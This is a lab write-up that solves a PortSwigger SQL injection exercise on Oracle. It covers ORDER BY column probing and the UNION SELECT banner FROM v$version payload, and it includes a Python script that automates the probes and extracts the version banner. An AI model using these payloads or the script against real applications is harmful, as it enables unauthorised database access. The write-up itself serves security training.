
03 - SQL injection attack, querying the database type and version on Oracle

This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query. To solve the lab, display the database version string.

Given: injection point (product category filter), database (Oracle)
End goal: display the database version string


Start the lab by clicking the "ACCESS THE LAB" button.

After starting the lab, click any category filter and intercept the request in Burp. The request looks like this:

[screenshot: Burp request]

Appending a single quote to the category value returns a 500 error. The quote closes the string literal inside the server-side SQL query and leaves the rest of the statement syntactically broken, so the error strongly suggests the parameter is injectable. A 500 on its own is not proof, though: a quick confirmation is that a doubled quote ('') in the same position brings the page back to 200, because it is a valid escaped quote inside the string.

[screenshot: Burp request]

Next we need the number of columns returned by the original query (not the number of columns in the database), because a UNION SELECT only works when both halves return the same number of columns. The ORDER BY technique finds this: ORDER BY n sorts the result set by its n-th column and raises an error as soon as n exceeds the column count. ' ORDER BY 2-- returns 200 OK, but ' ORDER BY 3-- returns a 500 error, so the query returns two columns. (On Oracle the other common probe, ' UNION SELECT NULL,NULL--, would fail for an unrelated reason: every Oracle SELECT needs a FROM clause, so it has to be written ' UNION SELECT NULL,NULL FROM dual--.)

[screenshot: 500 error request]

Knowing the query returns two columns, the injected category value becomes: ' UNION SELECT banner,NULL FROM v$version--. banner is a character column, and putting it in the first position works because the first column of the original query is a string type; if the types did not match, Oracle would reject the UNION. v$version returns one row per component, and the row beginning "Oracle Database" is the version string the lab asks for. URL-encode the payload (the quote, spaces and $ at minimum) when sending it as a query parameter.

[screenshot: injected query]
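The same procedure as a small script, added here as an example and not part of the original writeup or of PortSwigger's material: it builds the ORDER BY probes and the UNION payload, walks the column count up until the server errors, and pulls the "Oracle Database" banner out of the response. The lab URL shape (/filter?category=), the HTML fragment and the simulated responder are assumptions; swap simulated_status for http_status to run it against a real lab instance.

```python
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Optional

# Assumed URL shape of the lab's category filter (not taken from the page); replace the host.
BASE_URL = "https://YOUR-LAB-ID.web-security-academy.net/filter?category="


def order_by_payload(n: int) -> str:
    """Category value that closes the string literal, appends ORDER BY n and
    comments out the rest of the original query."""
    return f"' ORDER BY {n}--"


def union_payload(num_cols: int, expr: str, source: str, position: int = 0) -> str:
    """UNION SELECT with the same column count as the original query: `expr` in
    `position`, NULL elsewhere. Oracle insists on a FROM clause in every SELECT,
    so `source` is mandatory (v$version here, `dual` when no real table is needed)."""
    if not 0 <= position < num_cols:
        raise ValueError("position must be within the column count")
    cols = ["NULL"] * num_cols
    cols[position] = expr
    return f"' UNION SELECT {','.join(cols)} FROM {source}--"


def find_column_count(status_of: Callable[[str], int], max_cols: int = 20) -> Optional[int]:
    """Probe ORDER BY 1, 2, ... until the server errors; the last n that still
    returned 200 is the column count. None means no usable answer within max_cols
    (ORDER BY 1 already failed, or nothing failed and the probe is not reaching SQL)."""
    count = None
    for n in range(1, max_cols + 1):
        if status_of(order_by_payload(n)) != 200:
            return count
        count = n
    return None


ORACLE_BANNER = re.compile(r"Oracle Database[^<\n]*")


def extract_version(html: str) -> Optional[str]:
    """Pull the 'Oracle Database ...' banner row out of the rendered page."""
    m = ORACLE_BANNER.search(html)
    return m.group(0).strip() if m else None


def http_status(payload: str) -> int:
    """Send the payload as the category parameter and return the HTTP status."""
    url = BASE_URL + urllib.parse.quote(payload, safe="")
    try:
        with urllib.request.urlopen(url) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def simulated_status(payload: str, real_cols: int = 2) -> int:
    """Constructed stand-in for the lab (assumption, not a real server): 200 while
    ORDER BY n is within the real column count, 500 otherwise."""
    m = re.search(r"ORDER BY (\d+)", payload)
    return 200 if m and int(m.group(1)) <= real_cols else 500


if __name__ == "__main__":
    # Swap simulated_status for http_status to run against the real lab.
    cols = find_column_count(simulated_status)
    print("columns returned by the original query:", cols)
    if cols:
        payload = union_payload(cols, "banner", "v$version")
        print("payload:", payload)
        print("encoded:", urllib.parse.quote(payload, safe=""))
    # Constructed response fragment shaped like the lab's result table.
    sample_html = "<th>Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production</th>"
    print("version:", extract_version(sample_html))
```

The probe deliberately treats any non-200 status as the failure signal rather than parsing the error page, which keeps it usable against applications that hide the database error behind a generic 500.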

Lab solved:

[screenshot: solved lab]